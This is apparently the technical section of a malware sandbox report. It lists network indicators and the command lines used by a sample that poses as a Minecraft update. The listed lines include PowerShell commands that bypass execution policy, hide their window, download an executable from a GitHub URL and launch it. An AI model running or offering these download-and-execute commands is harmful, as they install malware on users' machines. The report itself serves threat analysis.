Technical Information
- https://github.com/exe1re/minecraft/raw/main/megaupdate.exe as name.exe
- 'gi##ub.com':443
- DNS ASK gi##ub.com
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -nop -w 1 (New-Object System.Net.WebClient).DownloadFile('https://github.com/ExE1re/Minecraft/raw/main/MegaUpdate.exe','name.exe')
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -nop -w 1 (New-Object -com Shell.Application).ShellExecute('name.exe')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -nop -w 1 (New-Object -com Shell.Application).ShellExecute('name.exe')